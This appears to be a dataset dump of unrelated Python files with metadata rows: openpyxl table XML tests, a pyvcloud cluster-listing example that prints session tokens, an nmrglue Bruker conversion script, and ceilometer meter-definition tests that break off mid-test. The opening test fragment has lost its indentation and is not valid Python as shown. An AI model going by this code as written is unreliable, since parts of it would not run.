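    # reference with fromstring()/from_tree() and compare the objects.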
def test_ctor(self, TableColumn):
col = TableColumn(id=1, name="Column1")
xml = tostring(col.to_tree())
expected = """
<tableColumn id="1" name="Column1"/>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TableColumn):
src = """
<tableColumn id="1" name="Column1"/>
"""
node = fromstring(src)
col = TableColumn.from_tree(node)
assert col == TableColumn(id=1, name="Column1")
@pytest.fixture
def Table():
from ..table import Table
return Table
class TestTable:
def test_ctor(self, Table, TableColumn):
table = Table(displayName="A_Sample_Table", ref="A1:D5")
xml = tostring(table.to_tree())
expected = """
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
displayName="A_Sample_Table" headerRowCount="1" name="A_Sample_Table" id="1" ref="A1:D5">
</table>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_columns(self, Table, TableColumn):
table = Table(displayName="A_Sample_Table", ref="A1:D5")
table._initialise_columns()
xml = tostring(table.to_tree())
expected = """
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
displayName="A_Sample_Table" headerRowCount="1" name="A_Sample_Table" id="1" ref="A1:D5">
<autoFilter ref="A1:D5" />
<tableColumns count="4">
<tableColumn id="1" name="Column1" />
<tableColumn id="2" name="Column2" />
<tableColumn id="3" name="Column3" />
<tableColumn id="4" name="Column4" />
</tableColumns>
</table>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Table):
src = """
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
id="1" name="Table1" displayName="Table1" ref="A1:AA27">
</table>
"""
node = fromstring(src)
table = Table.from_tree(node)
assert table == Table(displayName="Table1", name="Table1",
ref="A1:AA27")
def test_path(self, Table):
table = Table(displayName="Table1", ref="A1:M6")
assert table.path == "/xl/tables/table1.xml"
def test_write(self, Table):
out = BytesIO()
archive = ZipFile(out, "w")
table = Table(displayName="Table1", ref="B1:L10")
table._write(archive)
assert "xl/tables/table1.xml" in archive.namelist()
@pytest.fixture
def TableFormula():
from ..table import TableFormula
return TableFormula
class TestTableFormula:
def test_ctor(self, TableFormula):
formula = TableFormula()
formula.text = "=A1*4"
xml = tostring(formula.to_tree())
expected = """
<tableFormula>=A1*4</tableFormula>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TableFormula):
src = """
<tableFormula>=A1*4</tableFormula>
"""
node = fromstring(src)
formula = TableFormula.from_tree(node)
assert formula.text == "=A1*4"
@pytest.fixture
def TableStyleInfo():
from ..table import TableStyleInfo
return TableStyleInfo
class TestTableInfo:
def test_ctor(self, TableStyleInfo):
info = TableStyleInfo(name="TableStyleMedium12")
xml = tostring(info.to_tree())
expected = """
<tableStyleInfo name="TableStyleMedium12" />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TableStyleInfo):
src = """
<tableStyleInfo name="TableStyleLight1" showRowStripes="1" />
"""
node = fromstring(src)
info = TableStyleInfo.from_tree(node)
assert info == TableStyleInfo(name="TableStyleLight1", showRowStripes=True)
@pytest.fixture
def XMLColumnProps():
from ..table import XMLColumnProps
return XMLColumnProps
class TestXMLColumnPr:
def test_ctor(self, XMLColumnProps):
col = XMLColumnProps(mapId="1", xpath="/xml/foo/element", xmlDataType="string")
xml = tostring(col.to_tree())
expected = """
<xmlColumnPr mapId="1" xpath="/xml/foo/element" xmlDataType="string"/>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, XMLColumnProps):
src = """
<xmlColumnPr mapId="1" xpath="/xml/foo/element" xmlDataType="string"/>
"""
node = fromstring(src)
col = XMLColumnProps.from_tree(node)
assert col == XMLColumnProps(mapId="1", xpath="/xml/foo/element", xmlDataType="string")
@pytest.fixture
def TablePartList():
from ..table import TablePartList
return TablePartList
from ..related import Related
class TestTablePartList:
def test_ctor(self, TablePartList):
tables = TablePartList()
tables.append(Related(id="rId1"))
xml = tostring(tables.to_tree())
expected = """
<tableParts count="1" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<tablePart r:id="rId1" />
</tableParts>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TablePartList):
src = """
<tableParts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<tablePart r:id="rId1" />
<tablePart r:id="rId2" />
</tableParts>
"""
node = fromstring(src)
tables = TablePartList.from_tree(node)
assert len(tables.tablePart) == 2
| 28.368182
| 108
| 0.614164
|
df1e70add294121dc8b8c60f39917c2d84a65a90
| 1,298
|
py
|
Python
|
examples/list_clusters.py
|
h-medjahed/pyvcloud
|
696243a7f418987936f1ddce94dfeceaa9fd04d2
|
[
"Apache-2.0"
] | null | null | null |
examples/list_clusters.py
|
h-medjahed/pyvcloud
|
696243a7f418987936f1ddce94dfeceaa9fd04d2
|
[
"Apache-2.0"
] | 3
|
2017-08-24T07:32:12.000Z
|
2018-12-03T16:46:09.000Z
|
examples/list_clusters.py
|
useitcloud/pyvcloud
|
d3ed57b43d36d942edced2ee02cf6367d6826bb8
|
[
"Apache-2.0"
] | 1
|
2018-07-10T13:56:58.000Z
|
2018-07-10T13:56:58.000Z
|
#! /usr/bin/env python
import os
from pyvcloud.vcloudair import VCA
from pyvcloud.cluster import Cluster
def print_vca(vca):
    if vca:
        print('vca token: ', vca.token)
        if vca.vcloud_session:
            print('vcloud session token: ', vca.vcloud_session.token)
            print('org name: ', vca.vcloud_session.org)
            print('org url: ', vca.vcloud_session.org_url)
            print('organization: ', vca.vcloud_session.organization)
        else:
            print('vca vcloud session: ', vca.vcloud_session)
    else:
        print('vca: ', vca)
host='vcd.cpsbu.eng.vmware.com'
username = 'administrator'
password = os.environ['PASSWORD']
org = 'System'
org_url = 'https://%s/cloud' % host
verify = False
log = True
version = '27.0'
vca = VCA(host=host, username=username, service_type='standalone', version=version, verify=verify, log=log)
result = vca.login(password=password, org=org, org_url=org_url)
print_vca(vca)
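# list the clusters visible to this session (the variable name cse suggests
# these are served by the Container Service Extension, though the script
# itself only requires the generic cluster API)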
cse = Cluster(session=vca.vcloud_session, verify=verify, log=log)
clusters = cse.get_clusters()
print('clusters found: %s' % len(clusters))
for cluster in clusters:
print('cluster %s' % cluster['name'])
| 30.904762
| 107
| 0.66641
|
878c524e0eb4153cdd7604e03bebde9e5c465d9d
| 936
|
py
|
Python
|
examples/convert/bruker2pipe_2d/bruker2pipe_2d.py
|
genematx/nmrglue
|
8a24cf6cbd18451e552fc0673b84c42d1dcb69a2
|
[
"BSD-3-Clause"
] | 150
|
2015-01-16T12:24:13.000Z
|
2022-03-03T18:01:18.000Z
|
examples/convert/bruker2pipe_2d/bruker2pipe_2d.py
|
genematx/nmrglue
|
8a24cf6cbd18451e552fc0673b84c42d1dcb69a2
|
[
"BSD-3-Clause"
] | 129
|
2015-01-13T04:58:56.000Z
|
2022-03-02T13:39:16.000Z
|
examples/convert/bruker2pipe_2d/bruker2pipe_2d.py
|
genematx/nmrglue
|
8a24cf6cbd18451e552fc0673b84c42d1dcb69a2
|
[
"BSD-3-Clause"
] | 88
|
2015-02-16T20:04:12.000Z
|
2022-03-10T06:50:30.000Z
|
#! /usr/bin/env python
import nmrglue as ng
# read in the Bruker data
dic,data = ng.bruker.read("bruker_2d")
# Set the spectral parameters
u = ng.bruker.guess_udic(dic, data)
# Direct Dimension                             # Indirect Dimension
u[1]['size'] = 768 ; u[0]['size'] = 600
u[1]['complex'] = True ; u[0]['complex'] = True
u[1]['encoding'] = 'direct' ; u[0]['encoding'] = 'states'
u[1]['sw'] = 11061.947 ; u[0]['sw'] = 4000.000
u[1]['obs'] = 800.134 ; u[0]['obs'] = 201.204
u[1]['car'] = 4.773 * 800.134 ; u[0]['car'] = 58.742 * 201.204
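# (carrier frequency in Hz = chemical shift in ppm * observe frequency in MHz)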
u[1]['label'] = '1H' ; u[0]['label'] = '13C'
# create the converter object and initialize with Bruker data
C = ng.convert.converter()
C.from_bruker(dic, data, u)
# create NMRPipe data and then write it out
ng.pipe.write("2d_pipe.fid", *C.to_pipe(), overwrite=True)
| 36
| 75
| 0.528846
|
fe3108cb649bfed96f933daa594cde6f3cf2c282
| 41,007
|
py
|
Python
|
ceilometer/tests/unit/meter/test_notifications.py
|
Missxiaoguo/stx-ceilometer
|
a226b47216e76ec209818b900253d3c1f1ffc3aa
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/unit/meter/test_notifications.py
|
Missxiaoguo/stx-ceilometer
|
a226b47216e76ec209818b900253d3c1f1ffc3aa
|
[
"Apache-2.0"
] | 1
|
2018-08-16T15:18:09.000Z
|
2018-08-16T20:51:45.000Z
|
ceilometer/tests/unit/meter/test_notifications.py
|
Missxiaoguo/stx-ceilometer
|
a226b47216e76ec209818b900253d3c1f1ffc3aa
|
[
"Apache-2.0"
] | 3
|
2018-08-15T14:35:23.000Z
|
2019-01-11T15:57:02.000Z
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for ceilometer.meter.notifications
"""
import copy
import fixtures
import mock
import six
import yaml
from oslo_utils import encodeutils
from oslo_utils import fileutils
from ceilometer import declarative
from ceilometer.meter import notifications
from ceilometer import service as ceilometer_service
from ceilometer.tests import base as test
NOTIFICATION = {
'event_type': u'test.create',
'metadata': {'timestamp': u'2015-06-19T09:19:35.786893',
'message_id': u'939823de-c242-45a2-a399-083f4d6a8c3e'},
'payload': {u'user_id': u'e1d870e51c7340cb9d555b15cbfcaec2',
u'resource_id': u'bea70e51c7340cb9d555b15cbfcaec23',
u'timestamp': u'2015-06-19T09:19:35.785330',
u'created_at': u'2015-06-19T09:25:35.785330',
u'launched_at': u'2015-06-19T09:25:40.785330',
u'message_signature': u'fake_signature1',
u'resource_metadata': {u'foo': u'bar'},
u'source': u'30be1fc9a03c4e94ab05c403a8a377f2: openstack',
u'volume': 1.0,
u'project_id': u'30be1fc9a03c4e94ab05c403a8a377f2',
},
'ctxt': {u'tenant': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'request_id': u'req-da91b4bf-d2b5-43ae-8b66-c7752e72726d',
u'user': u'e1d870e51c7340cb9d555b15cbfcaec2'},
'publisher_id': "foo123"
}
USER_META = {
'event_type': u'test.create',
'metadata': {'timestamp': u'2015-06-19T09:19:35.786893',
'message_id': u'939823de-c242-45a2-a399-083f4d6a8c3e'},
'payload': {u'user_id': u'e1d870e51c7340cb9d555b15cbfcaec2',
u'resource_id': u'bea70e51c7340cb9d555b15cbfcaec23',
u'timestamp': u'2015-06-19T09:19:35.785330',
u'created_at': u'2015-06-19T09:25:35.785330',
u'launched_at': u'2015-06-19T09:25:40.785330',
u'message_signature': u'fake_signature1',
u'resource_metadata': {u'foo': u'bar'},
u'source': u'30be1fc9a03c4e94ab05c403a8a377f2: openstack',
u'volume': 1.0,
u'project_id': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'metadata': {u'metering.xyz': u'abc', u'ignore': u'this'},
},
'ctxt': {u'tenant': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'request_id': u'req-da91b4bf-d2b5-43ae-8b66-c7752e72726d',
u'user': u'e1d870e51c7340cb9d555b15cbfcaec2'},
'publisher_id': "foo123"
}
MIDDLEWARE_EVENT = {
u'ctxt': {u'request_id': u'req-a8bfa89b-d28b-4b95-9e4b-7d7875275650',
u'quota_class': None,
u'service_catalog': [],
u'auth_token': None,
u'user_id': None,
u'is_admin': True,
u'user': None,
u'remote_address': None,
u'roles': [],
u'timestamp': u'2013-07-29T06:51:34.348091',
u'project_name': None,
u'read_deleted': u'no',
u'tenant': None,
u'instance_lock_checked': False,
u'project_id': None,
u'user_name': None},
u'event_type': u'objectstore.http.request',
u'publisher_id': u'ceilometermiddleware',
u'metadata': {u'message_id': u'6eccedba-120e-4db8-9735-2ad5f061e5ee',
u'timestamp': u'2013-07-29T06:51:34.474815+00:00',
u'_unique_id': u'0ee26117077648e18d88ac76e28a72e2'},
u'payload': {
'typeURI': 'http: //schemas.dmtf.org/cloud/audit/1.0/event',
'eventTime': '2013-07-29T06:51:34.474815+00:00',
'target': {
'action': 'get',
'typeURI': 'service/storage/object',
'id': 'account',
'metadata': {
'path': '/1.0/CUSTOM_account/container/obj',
'version': '1.0',
'container': 'container',
'object': 'obj'
}
},
'observer': {
'id': 'target'
},
'eventType': 'activity',
'measurements': [
{
'metric': {
'metricId': 'openstack: uuid',
'name': 'storage.objects.outgoing.bytes',
'unit': 'B'
},
'result': 28
},
{
'metric': {
'metricId': 'openstack: uuid2',
'name': 'storage.objects.incoming.bytes',
'unit': 'B'
},
'result': 1
}
],
'initiator': {
'typeURI': 'service/security/account/user',
'project_id': None,
'id': 'openstack: 288f6260-bf37-4737-a178-5038c84ba244'
},
'action': 'read',
'outcome': 'success',
'id': 'openstack: 69972bb6-14dd-46e4-bdaf-3148014363dc'
}
}
FULL_MULTI_MSG = {
'event_type': u'full.sample',
'payload': [{
u'counter_name': u'instance1',
u'user_id': u'user1',
u'resource_id': u'res1',
u'counter_unit': u'ns',
u'counter_volume': 28.0,
u'project_id': u'proj1',
u'counter_type': u'gauge'
},
{
u'counter_name': u'instance2',
u'user_id': u'user2',
u'resource_id': u'res2',
u'counter_unit': u'%',
u'counter_volume': 1.0,
u'project_id': u'proj2',
u'counter_type': u'delta'
}],
u'ctxt': {u'domain': None,
u'request_id': u'req-da91b4bf-d2b5-43ae-8b66-c7752e72726d',
u'auth_token': None,
u'read_only': False,
u'resource_uuid': None,
u'user_identity': u'fake_user_identity---',
u'show_deleted': False,
u'tenant': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'is_admin': True,
u'project_domain': None,
u'user': u'e1d870e51c7340cb9d555b15cbfcaec2',
u'user_domain': None},
'publisher_id': u'ceilometer.api',
'metadata': {'message_id': u'939823de-c242-45a2-a399-083f4d6a8c3e',
'timestamp': u'2015-06-19T09:19:35.786893'},
}
METRICS_UPDATE = {
u'event_type': u'compute.metrics.update',
u'payload': {
u'metrics': [
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.frequency', 'value': 1600,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.user.time', 'value': 17421440000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.kernel.time', 'value': 7852600000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.idle.time', 'value': 1307374400000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.iowait.time', 'value': 11697470000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.user.percent', 'value': 0.012959045637294348,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.kernel.percent', 'value': 0.005841204961898534,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.idle.percent', 'value': 0.9724985141658965,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.iowait.percent', 'value': 0.008701235234910634,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.percent', 'value': 0.027501485834103515,
'source': 'libvirt.LibvirtDriver'}],
u'nodename': u'tianst.sh.intel.com',
u'host': u'tianst',
u'host_id': u'10.0.1.1'},
u'publisher_id': u'compute.tianst.sh.intel.com',
u'metadata': {u'message_id': u'6eccedba-120e-4db8-9735-2ad5f061e5ee',
u'timestamp': u'2013-07-29 06:51:34.474815',
u'_unique_id': u'0ee26117077648e18d88ac76e28a72e2'},
u'ctxt': {u'request_id': u'req-a8bfa89b-d28b-4b95-9e4b-7d7875275650',
u'quota_class': None,
u'service_catalog': [],
u'auth_token': None,
u'user_id': None,
u'is_admin': True,
u'user': None,
u'remote_address': None,
u'roles': [],
u'timestamp': u'2013-07-29T06:51:34.348091',
u'project_name': None,
u'read_deleted': u'no',
u'tenant': None,
u'instance_lock_checked': False,
u'project_id': None,
u'user_name': None}
}
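# The meter definitions exercised below are declarative: each field (name,
# volume, resource_id, project_id, ...) is a JSONPath expression evaluated
# against the notification, so meters are defined in YAML rather than code.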
class TestMeterDefinition(test.BaseTestCase):
def test_config_definition(self):
cfg = dict(name="test",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")
handler = notifications.MeterDefinition(cfg, mock.Mock(), mock.Mock())
self.assertTrue(handler.match_type("test.create"))
sample = list(handler.to_samples(NOTIFICATION))[0]
self.assertEqual(1.0, sample["volume"])
self.assertEqual("bea70e51c7340cb9d555b15cbfcaec23",
sample["resource_id"])
self.assertEqual("30be1fc9a03c4e94ab05c403a8a377f2",
sample["project_id"])
def test_config_required_missing_fields(self):
cfg = dict()
try:
notifications.MeterDefinition(cfg, mock.Mock(), mock.Mock())
except declarative.DefinitionException as e:
self.assertIn("Required fields ['name', 'type', 'event_type',"
" 'unit', 'volume', 'resource_id']"
" not specified",
encodeutils.exception_to_unicode(e))
def test_bad_type_cfg_definition(self):
cfg = dict(name="test", type="foo", event_type="bar.create",
unit="foo", volume="bar",
resource_id="bea70e51c7340cb9d555b15cbfcaec23")
try:
notifications.MeterDefinition(cfg, mock.Mock(), mock.Mock())
except declarative.DefinitionException as e:
self.assertIn("Invalid type foo specified",
encodeutils.exception_to_unicode(e))
class TestMeterProcessing(test.BaseTestCase):
def setUp(self):
super(TestMeterProcessing, self).setUp()
self.CONF = ceilometer_service.prepare_service([], [])
self.path = self.useFixture(fixtures.TempDir()).path
self.handler = notifications.ProcessMeterNotifications(
mock.Mock(conf=self.CONF))
def _load_meter_def_file(self, cfgs=None):
self.CONF.set_override('meter_definitions_dirs',
[self.path], group='meter')
cfgs = cfgs or []
if not isinstance(cfgs, list):
cfgs = [cfgs]
meter_cfg_files = list()
for cfg in cfgs:
if six.PY3:
cfg = cfg.encode('utf-8')
meter_cfg_files.append(fileutils.write_to_tempfile(content=cfg,
path=self.path,
prefix="meters",
suffix=".yaml"))
self.handler.definitions = self.handler._load_definitions()
@mock.patch('ceilometer.meter.notifications.LOG')
def test_bad_meter_definition_skip(self, LOG):
cfg = yaml.dump(
{'metric': [dict(name="good_test_1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="bad_test_2", type="bad_type",
event_type="bar.create",
unit="foo", volume="bar",
resource_id="bea70e51c7340cb9d555b15cbfcaec23"),
dict(name="good_test_3",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
self.assertEqual(2, len(self.handler.definitions))
args, kwargs = LOG.error.call_args_list[0]
self.assertEqual("Error loading meter definition: %s", args[0])
self.assertTrue(args[1].endswith("Invalid type bad_type specified"))
def test_jsonpath_values_parsed(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('test1', s1['name'])
self.assertEqual(1.0, s1['volume'])
self.assertEqual('bea70e51c7340cb9d555b15cbfcaec23', s1['resource_id'])
self.assertEqual('30be1fc9a03c4e94ab05c403a8a377f2', s1['project_id'])
def test_multiple_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(data))
expected_names = ['test1', 'test2']
for s in data:
self.assertIn(s.as_dict()['name'], expected_names)
def test_unmatched_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.update",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(0, len(c))
def test_regex_match_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
def test_default_timestamp(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][1]
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
multi="name")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual(MIDDLEWARE_EVENT['metadata']['timestamp'],
s1['timestamp'])
def test_custom_timestamp(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][1]
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
multi="name",
timestamp='$.payload.eventTime')]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual(MIDDLEWARE_EVENT['payload']['eventTime'],
s1['timestamp'])
def test_custom_timestamp_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.frequency',
event_type="compute.metrics.update",
type='gauge',
unit="ns",
volume="$.payload.metrics[?(@.name='cpu.frequency')]"
".value",
resource_id="'prefix-' + $.payload.nodename",
timestamp="$.payload.metrics"
"[?(@.name='cpu.frequency')].timestamp")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.frequency', s1['name'])
self.assertEqual("2013-07-29T06:51:34.472416+00:00", s1['timestamp'])
def test_default_metadata(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = NOTIFICATION['payload'].copy()
meta['host'] = NOTIFICATION['publisher_id']
meta['event_type'] = NOTIFICATION['event_type']
self.assertEqual(meta, s1['resource_metadata'])
def test_datetime_plugin(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="gauge",
unit="sec",
volume={"fields": ["$.payload.created_at",
"$.payload.launched_at"],
"plugin": "timedelta"},
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual(5.0, s1['volume'])
def test_custom_metadata(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id",
metadata={'proj': '$.payload.project_id',
'dict': '$.payload.resource_metadata'})]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = {'proj': s1['project_id'],
'dict': NOTIFICATION['payload']['resource_metadata']}
self.assertEqual(meta, s1['resource_metadata'])
def test_user_meta(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id",
user_metadata="$.payload.metadata",)]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(USER_META))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = {'user_metadata': {'xyz': 'abc'}}
self.assertEqual(meta, s1['resource_metadata'])
def test_user_meta_and_custom(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id",
user_metadata="$.payload.metadata",
metadata={'proj': '$.payload.project_id'})]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(USER_META))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = {'user_metadata': {'xyz': 'abc'}, 'proj': s1['project_id']}
self.assertEqual(meta, s1['resource_metadata'])
def test_multi_match_event_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(c))
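    # "lookup" names the fields whose JSONPath matches are list-valued; the
    # handler zips them into one sample per element and rejects payloads
    # whose list lengths disagree (see the invalid_missing/short cases below).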
def test_multi_meter_payload(self):
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "volume", "unit"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(MIDDLEWARE_EVENT))
self.assertEqual(2, len(c))
s1 = c[0].as_dict()
self.assertEqual('storage.objects.outgoing.bytes', s1['name'])
self.assertEqual(28, s1['volume'])
self.assertEqual('B', s1['unit'])
s2 = c[1].as_dict()
self.assertEqual('storage.objects.incoming.bytes', s2['name'])
self.assertEqual(1, s2['volume'])
self.assertEqual('B', s2['unit'])
def test_multi_meter_payload_single(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][1]
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "unit"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('storage.objects.outgoing.bytes', s1['name'])
self.assertEqual(28, s1['volume'])
self.assertEqual('B', s1['unit'])
def test_multi_meter_payload_none(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements']
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup="name")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(0, len(c))
def test_multi_meter_payload_all_multi(self):
cfg = yaml.dump(
{'metric': [dict(name="$.payload.[*].counter_name",
event_type="full.sample",
type="$.payload.[*].counter_type",
unit="$.payload.[*].counter_unit",
volume="$.payload.[*].counter_volume",
resource_id="$.payload.[*].resource_id",
project_id="$.payload.[*].project_id",
user_id="$.payload.[*].user_id",
lookup=['name', 'type', 'unit', 'volume',
'resource_id', 'project_id', 'user_id'])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(FULL_MULTI_MSG))
self.assertEqual(2, len(c))
msg = FULL_MULTI_MSG['payload']
for idx, val in enumerate(c):
s1 = val.as_dict()
self.assertEqual(msg[idx]['counter_name'], s1['name'])
self.assertEqual(msg[idx]['counter_volume'], s1['volume'])
self.assertEqual(msg[idx]['counter_unit'], s1['unit'])
self.assertEqual(msg[idx]['counter_type'], s1['type'])
self.assertEqual(msg[idx]['resource_id'], s1['resource_id'])
self.assertEqual(msg[idx]['project_id'], s1['project_id'])
self.assertEqual(msg[idx]['user_id'], s1['user_id'])
@mock.patch('ceilometer.meter.notifications.LOG')
def test_multi_meter_payload_invalid_missing(self, LOG):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][0]['result']
del event['payload']['measurements'][1]['result']
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
